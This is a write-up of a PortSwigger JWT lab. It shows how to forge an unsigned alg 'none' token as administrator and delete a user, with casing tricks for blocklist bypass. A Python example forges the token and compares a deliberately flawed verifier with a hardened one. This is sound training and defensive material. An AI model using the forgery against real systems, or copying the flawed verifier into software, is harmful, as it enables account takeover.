JWT authentication bypass via flawed signature verification
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification
Last updated
This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Go to the login page and log in as wiener.
The JWT extension shows that the session cookie is a JWT. Its sub claim is "wiener", so it is the session token for the account we just logged into.
Send the request to Repeater and open the JSON Web Token tab to inspect the header and payload.
In the JSON Web Token tab, change the payload's sub claim to "administrator" and change the header's alg to "none".
Then go back to the Pretty tab and change the id parameter in the request line to match: GET /my-account?id=administrator HTTP/2
Delete the signature (the third part of the session cookie, after the last dot) but keep the trailing dot, so the token is still three dot-separated segments: header.payload. followed by nothing. A verifier that honours alg: "none" checks no signature at all; a verifier that rejects lowercase "none" but only by blocklisting that exact string can often be bypassed with a variant such as "None", "NONE" or "nOnE".
Click Send, then Follow redirection.
The response shows we are now authenticated as administrator.
The response also reveals the admin panel's path: /admin
so we can move there with a GET request: GET /admin HTTP/2
Analysing that response, the request that deletes the user carlos is: GET /admin/delete?username=carlos HTTP/2
Send it and click Follow redirection to delete the user and complete the lab.
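The steps above as an added example, written for this page and not part of the original writeup or of PortSwigger's lab code. It mints a signed HS256 token under a constructed key (the lab's real key is unknown, and the attack does not need it), forges the unsigned alg: "none" variant with sub set to administrator, and then checks it against two verifiers: one modelling the lab's misconfiguration, where the token's own header decides whether a signature is required, and a hardened one where the server fixes the algorithm. The key, claims and the verifier functions are all assumptions for illustration.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example; the lab's signing key is unknown and the
# forged token below never needs it.
LAB_KEY = b"constructed-example-key"


def b64url_encode(raw: bytes) -> str:
    # JWT segments are base64url without '=' padding (RFC 7515 section 2).
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def decode_token(token: str):
    """Split a token into (header dict, payload dict, raw signature segment)."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), signature_b64


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Mint a properly signed HS256 token, standing in for the lab's session cookie."""
    signing_input = f"{encode_segment(header)}.{encode_segment(payload)}"
    mac = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def forge_unsigned(token: str, sub: str = "administrator", alg: str = "none") -> str:
    """What the Repeater steps do by hand: alg -> none, sub -> target, signature
    segment emptied. The trailing '.' stays so the token still has three parts;
    without it most parsers reject the token before they ever look at alg."""
    header, payload, _signature = decode_token(token)
    header["alg"] = alg
    payload["sub"] = sub
    return f"{encode_segment(header)}.{encode_segment(payload)}."


def verify_flawed(token: str, key: bytes):
    """The lab's misconfiguration: the token's own header decides whether a
    signature is required. Returns the claims on success, None on failure."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(payload_b64))  # no signature check at all
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(signature_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, key: bytes):
    """Fix: the verifier, not the token, picks the algorithm. Anything other
    than the configured HS256 is rejected, so 'none' in any casing fails."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, signature_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    original = sign_hs256({"kid": "example-kid", "alg": "HS256"},
                          {"iss": "portswigger", "sub": "wiener", "exp": 2000000000}, LAB_KEY)
    forged = forge_unsigned(original)
    print("forged token:", forged)
    print("flawed server sees sub =", verify_flawed(forged, LAB_KEY)["sub"])
    print("hardened server accepts forged token:", verify_hardened(forged, LAB_KEY) is not None)
```

The hardened verifier also illustrates why the fix is an allowlist rather than a blocklist: it never compares the alg value against "none", so the "None"/"NONE" variants fall out of the same check as every other unexpected algorithm.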